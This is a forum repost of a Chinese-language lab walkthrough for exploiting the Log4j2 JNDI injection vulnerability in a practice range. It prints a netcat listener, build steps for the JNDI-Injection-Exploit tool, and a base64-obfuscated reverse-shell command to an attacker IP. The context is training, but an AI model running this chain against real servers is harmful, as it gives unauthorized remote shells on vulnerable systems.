Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Recommended Posts

由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。

登录靶场

3947812341.png
选择我们的镜像系统,点击启动。
1905635032.png
在kali中监听7777端口

nc -lvvp 7777

2022318511.png

下载漏洞利用框架

git clone https://github.com/welk1n/JNDI-Injection-Exploit

安装maven

apt-get install maven

maven可以将java项目打包为jar文件。

cd JNDI-Injection-Exploit
mvn clean package -DskipTests#编译项目

打包完成后,会在/target/目录生成JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar文件。

攻击命令如下

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar  -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy4xMzcvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"  -A  192.168.137.137

参数说明:
这个安装在kali上面的jndi服务器是利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来启动起来的,启动参数包括-C是执行的bash命令,-c参数后面是执行的具体命令,用双引号引起来 -A 指服务器的IP。
需要注意的是,我们要对shell进行base64编码。(靶场在公网,本地的kali需要内网映射哦!)

1581145706.png
如下,我们成功得到了flag
1082741742.png
3467841856.png
提交后,可解锁所有关卡。
3246285982.png


版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/3677.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...